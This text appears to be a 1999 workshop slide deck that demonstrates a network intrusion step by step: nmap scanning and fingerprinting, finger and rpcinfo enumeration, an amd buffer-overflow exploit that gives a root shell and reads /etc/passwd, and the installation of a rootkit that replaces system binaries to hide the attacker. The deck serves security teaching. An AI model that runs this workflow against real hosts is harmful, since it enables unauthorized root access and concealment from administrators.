intrusion demonstration part i
DESCRIPTION
Intrusion demonstration Part I. Postech PLUS Taeho Oh (PLUS015) [email protected]. Contents. Scan wide area network Using powerful network scanner, nmap Find the running hosts in the network Gather the host information Get root permission from the target host - PowerPoint PPT PresentationTRANSCRIPT
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Intrusion demonstrationPart I
Postech
PLUS
Taeho Oh (PLUS015)
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Contents
• Scan wide area network– Using powerful network scanner, nmap– Find the running hosts in the network– Gather the host information
• Get root permission from the target host
• Hide himself from the admin
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Scan wide area network (1)
• Using powerful network scanner, nmap– nmap can do ftp bounce scan, stealth scan, OS
prediction, and so on.– http://www.insecure.org/nmap
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Scan wide area network (2)
• Find the running hosts in the network[ root@ohhara ~ ] {1} # nmap -sP "141.223.xxx.*"Host (141.223.xxx.0) appears to be up.Host (141.223.xxx.0) seems to be a subnet broadcast address (returned 111 extra pings). Skipping host.Host kwxnxoo.postech.ac.kr (141.223.xxx.7) appears to be up.Host xojx.postech.ac.kr (141.223.xxx.9) appears to be up.( . . . )Host victim.postech.ac.kr (141.223.xxx.75) appears to be up.Host xstxos.postech.ac.kr (141.223.xxx.77) appears to be up.Host anxelx.postech.ac.kr (141.223.xxx.78) appears to be up.Host mxrlxns.postech.ac.kr (141.223.xxx.79) appears to be up.Host (141.223.xxx.99) appears to be up.Host (141.223.xxx.255) appears to be up.Host (141.223.xxx.255) seems to be a subnet broadcast address (returned 93 extra pings). Skipping host.Nmap run completed -- 256 IP addresses (27 hosts up) scanned in 2 seconds
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Scan wide area network (3)
• Gather the host information[ root@ohhara ~ ] {2} # nmap -I -O 141.223.121.75Interesting ports on victim.postech.ac.kr (141.223.xxx.75):Port State Protocol Service Owner21 open tcp ftp root23 open tcp telnet root25 open tcp smtp root53 open tcp domain root79 open tcp finger root80 open tcp http nobody( . . . )6000 open tcp X11 root
TCP Sequence Prediction: Class=random positive increments Difficulty=2098031 (Good luck!)Remote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2Nmap run completed -- 1 IP address (1 host up) scanned in 19 seconds
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Scan wide area network (4)
• Gather the host information[ root@ohhara ~ ] {3} # finger @141.223.xxx.75[141.223.xxx.75]Login Name Tty Idle Login Time Office Office Phonekotaeji Kim Taehyung /0 20:46 Oct 27 19:41[ root@ohhara ~ ] {4} # rpcinfo -p 141.223.xxx.75 program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind( . . . ) 100021 1 udp 1026 nlockmgr 100021 3 udp 1026 nlockmgr 100021 1 tcp 1024 nlockmgr 100021 3 tcp 1024 nlockmgr 300019 1 tcp 878 amd 300019 1 udp 879 amd
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Get root permission from the target host
• Get root with amd buffer overflow exploit[ root@ohhara ~ ] {5} # ./amd-ex 141.223.xxx.75Attack 141.223.xxx.75amq: could not start new autmount point: Connection timed outConnect to the shellLinux victim 2.2.5-22 #1 Wed Jun 2 09:17:03 EDT 1999 i686 unknownuid=0(root) gid=0(root)iduid=0(root) gid=0(root)cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:daemon:x:2:2:daemon:/sbin:adm:x:3:4:adm:/var/adm:lp:x:4:7:lp:/var/spool/lpd:sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown( . . . )
Taeho Oh/PLUS3rd CONCERT Workshop Nov. 1999
Hide himself from the admin
• Install rootkit
• Trojan files of ohhara rootkit– chgrp, chmod, chown, cp, ln, ls, mkdir, mknod,
netstat, ps, touch, dir, du, find, mkfifo, oldps, top, vdir, fixdate, in.inetd, in.smbd, in.telnetd, pam.pwdb.so
[ root@victim ~ ] {1} # tar -xzf ohhara-rootkit.tar.gz[ root@victim ~ ] {2} # cd ohhara-rootkit[ root@victim ~/ohhara-rootkit ] {3} # ./install-ohhara-rootkit